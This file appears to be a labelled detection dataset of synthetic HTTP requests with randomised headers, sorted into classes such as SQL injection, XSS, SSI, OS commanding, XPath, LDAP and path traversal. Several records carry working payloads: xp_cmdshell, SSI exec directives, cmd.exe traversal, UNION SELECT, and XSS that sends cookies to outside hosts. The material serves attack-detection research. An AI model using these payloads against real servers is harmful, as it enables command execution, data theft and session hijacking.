GET /0fAHwflt.nsf?o2=29504&OgehrEo6eo=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fls++-l+++++%2Fhome%2F3took6%2FiBa%22+++++--%3E HTTP/1.1
Host: 54.198.203.64:5668
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rULN-el;q=0.9, 6bin0-dg;q=0.5
Cache-Control: sroer=Sb
Client-ip: 54.13.6.126
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="029"
Date: Fri, 29 Feb 08 13:55:50 CET
ETag: "qmJ@VE5bg4LWn_pk"
Expect: mlsu1av
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: "LJiFlW5t82r5m9yZdIh@"
If-None-Match: "jTvMhOVu-jSAO3WBy"
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 2
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: Digest qop=auth
Range: 563-54,0904-,88598-0
Referer: /Hhranq1i.pl
TE: trailers,chunked
Trailer: Warning
User-Agent: oi0eehi/1.7.7
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5714x2082
Via: FTP/1.7 www.trrbtT.gif, FTP/8.6 245.16.69.56
Transfer-Encoding: compress
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 197.14.49.35
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40150
Start - Id: 35436
class: SqlInjection
GET /ucst/msS0Cm/6AZHMFMP/jRobmg45dg07as.Ni/xVXSnY5_hWlZ/ssniuwcd/PsamHfLJCn_o/oEsdbnQEanli.msf?ho6hCytMptvclnj=qwer%27++or++++yqzgau_v.Account%3D%27ebwutne%403F5pog.com&huAobeateoa=c9aaOaan+lDi0at&nJotha85toe=10650&smsen9p=3176470&dsftaei=17&wntsoeR4roep=36&nik4cte=lnznpedhuuo&tsjttrrrnzm=+%267ef&m7at=maeqarGqi HTTP/1.0
Host: www.p6lj0vsr.com
Connection: keep-alive
Accept: application/rtf
Accept-Charset: euc-kr
Accept-Encoding: deflate
Accept-Language: ier3y-pw;q=0.1, w-eoacewse;q=0.0
Cache-Control: ttintne='fiveiBs'
Client-ip: 211.249.233.8
Cookie: tdt0er8aor=Rupdate;rm3enm=4110;mt=lib=vtuAoirw~]eN;;pns=uLaialuvMWNY;EU5ymr=iffzDud2H;cuU=Ec
Cookie2: $Version="94"
Date: Sun, 28 Jun 09 17:54:02 CET
ETag: W/"5rgyakrT9GajtwJuxJ"
If-Modified-Since: Wed, 16 Jul 08 20:05:15 CET
If-Unmodified-Since: Mon, 12 Nov 07 19:28:33 UTC
If-Match: "FJvoLh-G0EVGOMA"
If-None-Match: "kQQhM7FyU5rzLUp49Y0I"
If-Range: "zlXUjkJtk8Wh5mK"
Max-Forwards: 2
Referer: http://0HVYsbn.ch/iiia/gi7hmer/sde2c.conf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.2 (X11; U; SunOS sun4u 3.0; en-tx; rv:5.2.4) Gecko/48661956
UA-OS: FreeBSD
Via: ne6c/7.8 87.253.213.51:72560, FTP/3.1 www.fouf.shtml:3, HTTP/4.7 110.25.90.222
Transfer-Encoding: deflate

null

End - Id: 35436
Start - Id: 41015
class: SqlInjection
PUT /e8oFeLMV1M5RIBkva2kH/lHhQVvAse/Plscriptbnc/t4yS7.pl? HTTP/1.0
Content-Length: 307
Content-Language: ie,i
Content-Encoding: gzip
Content-Location: /tgwufteO/elfUe/slRrpA.js
Content-MD5: ZWZubm5iZG5lbkFqbjh3Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Jul 06 14:15:41 UTC
Last-Modified: Fri, 20 Jan 06 04:12:01 GMT
Host: www.fxn6ei.com
Connection: aIkiyo
Accept: application/*;q=0.4, video/*;q=0.8, video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 168.241.203.79
Cookie: Dprocessing-instructionlJXthvdDj=cfju6eid1jh;liwedCea6=7640802;dHq=eqconnect7erttre@ 
Cookie2: $Version="131"
Date: Fri, 23 Nov 07 15:00:47 UTC
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: eddo4bhd@tahahlyhn9.org
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Fri, 22 Jul 05 11:02:15 GMT
If-Match: *
If-None-Match: *
If-Range: "7Y5IP_-jwtjDSFv"
Max-Forwards: 3153
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: stso6 ogso9=thaamu
Authorization: esnih onsrelh6=edcoaa9g
Range: -388
Referer: /sfrbe/ieei9/yuTdeiqT/mlc2tYo/wrun9ijg.sh
TE: deflate
Trailer: Expect
User-Agent: esoaartp/2.7.0
UA-CPU: x86
UA-Disp: 856,630,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 892x2342
Via: 7.6 www.ilIrsep.jpeg:023, bbLl/8.7 www.e0dr.gif, HTTP/3.0 123.191.207.254
Transfer-Encoding: gzip
Upgrade: rhn/5.7, rco2/7.4, ebrn/2.9, n0ek0/3.4
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 190.76.80.54
X-Serial-Number: 3513776009500054162
----: ---------------
~~~~~: ~~~~~~~~~~~~

eklitUyyy=rk9Wb-xc&s2tbd4Wo5at=e9Umt2orch8&aov6=ntecgm75e&0jMWuR@_FOXq=libb04&o5MogdogO9=e>mtc)]calmochagn k&tr9zihsai=';EXECmaster.dbo.xp_cmdshell'cmd.exe&C959h=paSndmdthfiasyf&iiqeeqzreilft=7iaeer9synMEcpeH&stNC8=hrued&enqsneeiokiiar=(ce c&e32N9=426092749&.zgD2ZyW=898&-lxfrom=Eodshtft;ifw

End - Id: 41015
Start - Id: 44478
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.wweWTe.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: alnosst=eu2ttn
Client-ip: 237.182.55.206
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="51"
Date: Sun, 10 Jun 07 03:25:22 UTC
ETag: W/"13mKTN2CeNKE4vV_gU1V"
Expect: nets=rpaui;afeisve8=e88t
From: bniw@mamjmaT.net
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Mon, 22 Sep 08 18:09:34 UTC
If-Match: *
If-None-Match: "kjvTi-5leKjEhe72zVM9"
If-Range: *
Max-Forwards: 594
MIME-Version: 3.4
Pragma: e='etee'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: NTLM YTdrd2ZuaWVuM2ZhYWVlb2x6dDRyZWFpdE5oaGU0aG9ldA==
Range: 31467-04,46-
Referer: http://www.Ms2l4h.gov/rsje.exe
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (compatible; Konqueror/0.8; SunOS sun4u; 5lae; ufoJodmbA)
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4559x569
Via: FTP/9.6 155.59.249.63, 8nwen/7.4 93.239.96.201, HTTP/7.0 151.80.204.98
Transfer-Encoding: deflate
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44478
Start - Id: 47912
class: XSS
GET /t.Ngc4uzwczGG/pVOzCZGwiuW_GnEf0xVI/lZ1cn8a9r04BYhz3ui4/e10vm@.rXuvehwt/4ACqgnumyformYn/kvdrieyeinv/D6uirV/@vaAEiGGpFCmoU/fvLVR5TviWn/il/sCzsQ5YMBX.js?QYzdlsnQDYad=he6&a2aPterind=%3Ciframe++src%3D++++%22++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F115.143.112.178%2Frenein.mdb%27%2Bdocument.cookie%29%3B%5D+++++++%22++++%3E&ndlnc=sze1il%3Fdxmlm HTTP/1.1
Host: www.elchgn.cz
Connection: btee
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad, x-mac-japanese, x-mac-turkish, windows-874;q=0.9, x-mac-icelandic;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: nc7oaa-eFn5ere2, EnN-mTj;q=0.1, ui-yn, e-l1p;q=0.1, oho-us9teA
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: se=aued;dHenfamsebsnak=votstQytlmcna0;2eho7r=9471;itee=odrQ2-YX6K
Cookie2: $Version="6"
Date: Thu, 22 Jun 06 07:29:31 CET
ETag: W/"cJc-HCc20ZvA@@p"
Expect: ststi=La4tm;napsfnLs
From: 4ebutle@EleUossins.org
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: *
If-None-Match: "kF-F9w5nbD2A0l1"
If-Range: Mon, 29 May 06 08:12:56 CET
Max-Forwards: 3
MIME-Version: 8.4
Pragma: 7U=msniie
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: -419,3-
Referer: /sfcanq0/ssmbcA/stdsuss/sMenv/eeur.htm
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 3.0; ey-iv; rv:5.0.4) Gecko/29298755
UA-CPU: x86
UA-Disp: 1161,524,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.8 www.lsffikew.jpeg, 1eefe/4.1 www.A89m.gif, HTTP/9.0 217.16.173.81
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47912
Start - Id: 39258
class: SSI
GET /hf@7dal/96Jk@ODU3guy6I_16q/mAEqe5yimmwreq/8iS2H26w0FfVh08XO0hD/7-eQIrvJ3Gjc@2j/kSEbcqohBdbW.t6f/eeal.aspx?Eefek7cM=exechomes%25ye&dTDGDUeQVOSA=%3C%21--%23email+fromhost%3D%22www.Iigtma.com%22+tohost%3D%22mailbox.reeU.com%22+message%3D%22opooso+eiolrl+tsd+myioe%22+fromaddress%3D%22ebtolW.com%22+toaddress%3D%22bettS.aEmnbo.com%22+subject%3D%22s%22+sender%3D%22eEld.com%22+replyto%3D%22Usace.com%22+cc%3D%22hnl%22+inreplyto%3D%22avt+ht0h+r%22+id%3D%22sOigimail%22+--%3E HTTP/1.0
Host: 209.89.107.63
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: j-nrp, uoc0d6s-zoh;q=0.5, sattdeo-n;q=0.4, cq17Xte-v, dedns-ctaeap;q=0.8
Cache-Control: max-age=673
Client-ip: 120.3.200.190
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="81"
Date: Wed, 06 Jan 10 20:46:15 GMT
ETag: "I6x001IZy.Iz5lBYh"
Expect: 1tru4e0e=nmgodha;Hlme=rptcyece
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 09 Dec 05 02:21:53 GMT
If-Unmodified-Since: Tue, 17 Jan 06 08:13:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 533
MIME-Version: 2.5
Pragma: uvphOt='ig8st'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM ZXQwYWFlY284ZXRuaGFJYW5vZW8wb3NoYTA5bm5heXVkbnJld2c=
Range: 5-9725,-6683
Referer: http://www.mef7ssur.st/I1aO.cfm
TE: chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 1.4; hj-ht; rv:1.2.5) Gecko/85670998
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 272x2054
Via: ugiea/6.5 www.achted.gif:44
Transfer-Encoding: compress
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 175 www.eSis7tea.tiff:885 "oeto0awd6ika" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39258
Start - Id: 48494
class: XPathInjection
GET /vaE2p-x698PM@/7eftseetHagi/rEfmr/8e6inehui/dlgXJw473D46wK2U/B7rhreo8I6noMyheb0u/jSht/athdtle5earr/kd4REAyh./pufnnSnoa9aedCi4oit/9CYE97DSxGwMM3szyUZ.js?dsre=lhebhiframeopenMN+Ggroup+by6saEs&dnh1bc2=ac0btt1eiv&aMhdurs=032&g2ugeG=nl+sN5wOtfa%3F+ee&rne4c=tdI&6AcadlVcgueww=uwyihe%3Aohoimgso&OxdrNa=klestEiinclude&t9uzse4wyieonil=8412248&iRusieuda=EethneladrtbetVe6y&@pinLkAmaKWiV=nT&B0aA=55579&wkmonMe=u5ofenmttyf&CVYimgEVb4.T=oog8hsg0etorn&fajvh=tr6aoavis HTTP/1.1
Host: 208.151.112.15
Connection: 2rhr
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: irja5-rEO;q=0.0, iot6rnN-Cdad, 6-Pierrn, oen-icdaled;q=0.4
Cache-Control: no-cache
Cookie: do9akeegtepir=fe5bib' or    casvmt/TdqOee/child::node()[processing-instruction()=528]  or     '1nd7s'    = ';twhcn8rl93iomir=othleRDd9amdc2Ds0o
Date: Mon, 14 Jul 08 09:32:49 UTC
If-Unmodified-Since: Wed, 15 Aug 07 09:47:23 UTC
If-Match: "fCqndQjd0qtGixC"
Max-Forwards: 213
Proxy-Authorization: behsvh 1FliUd=dddot
Authorization: Digest nonce
Range: 3577-
Referer: http://tr7ttt3S.uk/cOVierI/uWabEs.avi
User-Agent: 2eGxc-23w http://www.iasesIer.it
Warning: 993 www.dfykr.js "ro2epftesrsErntzCn3" "Thu, 18 Nov 04 14:59:20 UTC"

null

End - Id: 48494
Start - Id: 49435
class: XPathInjection
GET /e60Qx_K._cl9ca0m/i2chde/iSHleMte/aOIaO_JDhONUAln/betweenIXhomeXZ4Yny/eYSV01hupr/2uCiieeselneja.exe?Nvs0aspE=3++++or+++++tgmsed%2Fti%2F77%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D747%5D++++or++3%3D&jdacnalqeh6=eval&iloeemYsat7jled=806753&netcat@U4O=eviaalsonhrcdh&_cuCTm=TdEooto&Bemvbtnone=connectvr1formc&4wqjAstyleEgBpY=oO3ivmee HTTP/1.1
Host: www.thst.biz:80
Connection: close
Accept: */*
Accept-Charset: cp-932, x-mac-turkish, iso-8859-3;q=0.1, euc-kr, x-mac-roman;q=0.4
Accept-Encoding: identity, gzip
Accept-Language: e5Oenne-seia;q=0.4, rpYsgm-eat;q=0.0, Q4snxrih-Ze, e7h-f
Cache-Control: max-age=5510
Client-ip: 64.61.159.147
Cookie: eelo=187588325;etZ3v=a4sb_9;oX1NZja60dkF=1915;etrh=lxK4HWs@;axevh=46012669
Cookie2: $Version="9"
Date: Mon, 07 Jul 08 12:04:12 UTC
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: a15tta=behdai;yearlc=mn7sjuc
From: poiter@eorm.biz
If-Modified-Since: Fri, 16 Mar 07 13:31:42 GMT
If-Unmodified-Since: Tue, 20 Dec 05 18:26:55 UTC
If-Match: "psGxxcK8LxL73@UtYtx"
If-None-Match: *
If-Range: Sat, 10 Dec 05 22:53:27 UTC
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVhZXJSbWlwaDlobnJvemNhOWhlMHl0M3RjdHR5UGl1czh4
Authorization: NTLM aG54eWh0TWRuY29kYWFhcmRlaWFhTjFldGJ0YW5pZmE=
Range: 60-32,32547-,55039-
Referer: http://taaa.com/n22hossl/ooDshh/4ytms0C/ledrn1tp.cgi
TE: gzip,trailers
Trailer: Expect
User-Agent: 7eS5avdfeuipyo3
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: aYsnt/6.2 www.eto7.tiff, HTTP/4.9 www.0oteOpIe.js, 2.6 26.178.55.229:3
Transfer-Encoding: ofet; oyloye=ti7qs1
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 120 135.114.81.169 "7hhdTc" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49435
Start - Id: 37735
class: LdapInjection
GET /me7eirs4vftifo8/hljYp/renL61g/Ee9okega/svR3xdmqH1wyi4t/2acentoasffEHr77u/etyEIr47sjlrrVMxZmap/wMOOR/gvZ16G.RG.mdb?LkDA=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&t7uh=046074 HTTP/1.1
Host: www.7eEmdep.be
Connection: close
Accept: image/*, text/plain;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: erevca-tk;q=0.3, rady-I7, 4io-hAbb, gve-sohdr;q=0.4
Cache-Control: no-transform
Client-ip: 8.94.0.219
Cookie: ioirui=0t
Cookie2: $Version="362"
Date: Tue, 04 Aug 09 04:13:10 CET
ETag: W/"bCfqrlXCud@@Yi6"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Sun, 06 Apr 08 18:56:20 UTC
If-Match: *
If-None-Match: "WSYNrxVLmy2p8LH1o"
If-Range: "5rLgSkRYRNIlYyAp_ik"
Max-Forwards: 06
Pragma: emtm1i='niroRl'
Authorization: Basic dXR4ajpsamRQdGg=
Referer: http://www.horlTe.net/rkewt/t0sa.mp3
Trailer: Date
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 2.2; ei-ei; rv:4.9.3) Gecko/82102375
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
Via: 3.1 www.otamen9.js, HTTP/0.6 www.erohT9Nt.shtml, FTP/6.8 122.121.127.181
Transfer-Encoding: deflate
Upgrade: 4da/3.4
Warning: 069 www.lmgThl1.html "siohotdtta4mee" "Sat, 10 Jan 09 23:15:18 UTC"
X-Forwarded-For: 33.253.224.201
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37735
Start - Id: 37985
class: LdapInjection
GET /hewue5i1nhaswt/ymTNn2U/g0winntnzQrM/tH@lenVUeeWkEUm/paw/9C1irt2lw6n8/sJ_rSppwHqAi0941/iyS.S/shsgo/omC/rsrNToske.msf?in7odcgoi0=1092105&Fvbscript26YVi-I.@=rieeitbmhtShr%5Ct&-lr5P=crnrsDe&ptaejfO4oijlia=lesivaYg7elq&qsre4Ag=ka_3kOX&xexec@rp2Xf5=ht&ocetfje=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sistrbauafeiIhd=hMO&bawwertntteeVn=a&lptsO=oeisse&hratVrbrynnSe=ncsmnuwreebkehy&Api=h+erssaegnree0Oa HTTP/1.0
Host: 132.56.73.107
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="0"
Date: Mon, 25 May 09 16:43:11 GMT
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Fri, 26 Dec 08 05:27:47 CET
If-Unmodified-Since: Sat, 25 Jul 09 24:58:52 UTC
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: "ZxYGr-EE-ul2cKxlyV"
Max-Forwards: 3594
MIME-Version: 4.1
Pragma: n='iteCc'
Proxy-Authorization: Digest nc=Fe26BDc0
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: http://1oT2.cz/agtus/eeie6my.asp
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/3.3 (X11; U; Linux i386 3.3; 6v-he; rv:0.9.7) Gecko/64389223
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: FTP/1.4 193.183.36.68, FTP/5.1 www.Irdjlph.jpg, 2.2 178.31.65.174
Transfer-Encoding: identity
Upgrade: ieu/6.3
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37985
Start - Id: 45009
class: PathTransversal
GET /69i/sD5fezGQl05/exzSvP5m5/l6X6cAN@Um6/fTCzKph5N0oDvO87VE/0fpoyRsh4r/r_6gTX.tzH3srZvKfGA4/sqpgG/smOCCYfLsDB4Zvq8N/aQ3/odaAun7dr/ipasswd.shtml?ri9ecotve2=2785497&dxnsodstitIsgya=+echoeiyhEthemetaEbpmtu&haosca=jllh3sMeem1&ndx=ftp%5Dosf&cnxsns9A=t%26copy%40i&ft1aivtess=7030112&pp_XyZQmYS=sAkgNN2yKQ&Moimseep=yktls&saelr9yItoi=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&eebeoRsF9uN=891804846 HTTP/1.0
Host: www.i6ylnrctl.com
Connection: close
Accept: application/x-tar;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: qblwfwe-5soeh
Cache-Control: only-if-cached
Client-ip: 112.213.27.172
Cookie: banoSqno= sbmo;nNBp.=eit0tivna4r;afehiUStl6=@nhaltb;ew=efyErathiuilcs/;VwinntYselect7s5=eol8I;zhc=86149
Cookie2: $Version="75"
Date: Thu, 20 Jan 05 04:05:35 GMT
ETag: "06Aqq7j6Gd0C_dK"
Expect: 100-continue
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Mon, 31 Aug 09 24:54:47 UTC
If-Unmodified-Since: Thu, 07 Oct 04 22:01:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: NTLM aXNyYWVzaHlnbnRlaWF0UTlnbGN0bXBjaWFxdHR0aTNhdDJ2cmVhc3M=
Range: 2613-116,8-,0-
Referer: /ieeaknI/AaygoT/w6lg5nhw/lhtneTp3.mpg
TE: chunked;q=0.4,trailers
Trailer: User-Agent
User-Agent: ortSceedcovpnd
UA-CPU: StrongARM
UA-Disp: 100,251,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 569x3212
Via: 7.4 63.63.16.209, 8.8 183.140.106.250, 5.7 www.enh4.htm:0152
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 841 177.253.103.43 "siish1237R9c5ebtn" "Mon, 07 Dec 09 02:26:19 UTC"
X-Forwarded-For: 179.111.85.226
X-Serial-Number: 416965693629057217
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45009
Start - Id: 41370
class: SqlInjection
POST /nSrCaq@q2vrSZV/eioslYN/wThexta/varIXxc20VySg2fyN/tsR.LN-.asp? HTTP/1.0
Content-Length: 348
Content-Language: a,pbhtm,traa
Content-Encoding: identity
Content-Location: http://www.caviimn.be/m7eC/7ccb/ausTzzC/tNSisltt/eH95ti.html
Content-MD5: dGlpZGFldDZ0eWhpMGVpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Sep 04 19:42:30 UTC
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: www.vig9emlc.fr:1
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-jp;q=0.3, windows-874;q=0.0, ks_c_5601-1987, x-mac-icelandic;q=0.7, x-mac-ce;q=0.6
Accept-Encoding: gzip, compress;q=0.7, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 200.4.215.226
Cookie: d0varF6SFBDH='uw~ eo4u\tmadcm\i;eseoa=dKYcjSUK
Cookie2: $Version="234"
Date: Fri, 21 Sep 07 07:27:24 UTC
ETag: "1szJG5Qqdon.9toUC3"
Expect: 100-continue
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 08 Mar 09 20:01:51 UTC
If-Unmodified-Since: Sat, 28 Mar 09 13:40:00 CET
If-Match: *
If-None-Match: *
If-Range: "JIt9OtrUh.0jIuhpT-dF"
Max-Forwards: 08
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: Basic eWltd286ZWl6cmQ=
Range: 830308-6,-133
Referer: http://o2ocmftp.cz/tetni/2lI7mfSc/n6ndhnij.pdf
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: cA3ZIV_ http://www.uror.de
UA-Disp: 320,3937,32
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/5.9 172.53.5.70:134
Transfer-Encoding: identity
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: --------------

asty=Sasttsf4eats&x3QCc6Ac=1806&iymElei6=sY2n&mf5fkednebssct=595&th8hab=6oiqwp-&dvl2ogo7o=n9Ea&QNZC_Nwk=7681302678&nnr9k6o5n7rttdt=1&eow=e@R9ktzSbDT1&az='  )   UN/**/ION     ALL    SEL/**/ECT     'nsoto',272,92024,'qhLll',9   FROM     sy   WHERE (    ''   ='&ZLNbm8czw_B=00949&edeeun=heedx&t4x=7117&9sd=95917

End - Id: 41370
Start - Id: 46935
class: XSS
PUT /tel@/hllb9.2ROgZS/epppTF-RSA.J@8841/3APFVYpxj@Vu/naFS/lnF.2E.xIG1VXNfc/gnews5hyyje9/i9x_K/replaceWadminC.5NZWNi5p1y.htm? HTTP/1.0
Content-Length: 264
Content-Language: fh7rteS,ehiaep,sn
Content-Encoding: deflate
Content-Location: http://www.IYvyntVi.org/uixmawu/lrjsT/LdNrt.dll
Content-MD5: aG85TmhjYWFzaXRpWmhvTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 10 17:02:26 GMT
Last-Modified: Tue, 05 Jan 10 12:30:21 GMT
Host: 163.149.86.227:00
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 96.17.77.33
Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="688"
Date: Thu, 20 Sep 07 18:34:38 CET
ETag: W/"@EO1@@IWjcaKk@I8WI82"
Expect: Loer=fteWoeui
From: ncieL@oi8koae0fn.net
If-Modified-Since: Mon, 04 Sep 06 09:45:29 CET
If-Unmodified-Since: Tue, 15 Dec 09 15:30:25 UTC
If-Match: *
If-None-Match: "mDBwr-w9dGnxE36"
If-Range: *
Max-Forwards: 1982
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Digest qop=v1tssr
Range: 455810-240,-24385
Referer: /es19k/aethn.avi
TE: trailers,trailers,deflate;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.7 (X11; U; Solaris 7.2; 4t-5d; rv:6.5.7) Gecko/36253829
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 786 205.251.22.179:965 "eu9tt91t" "Sat, 27 Jan 07 19:48:05 UTC"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

TEdloARTDSyl=n4@zUQqxz@SQ&eiT3e=qths|rua9y d&njtmaaomE=mrTf<&tias=ellbin&&rrjcawpsl=<a    href="    javas&#99;ript&#35;[document.location.replace('http://www.liar.com/cgi-bin/ra.cgi'+document.cookie);]  " >

End - Id: 46935
Start - Id: 35357
class: SqlInjection
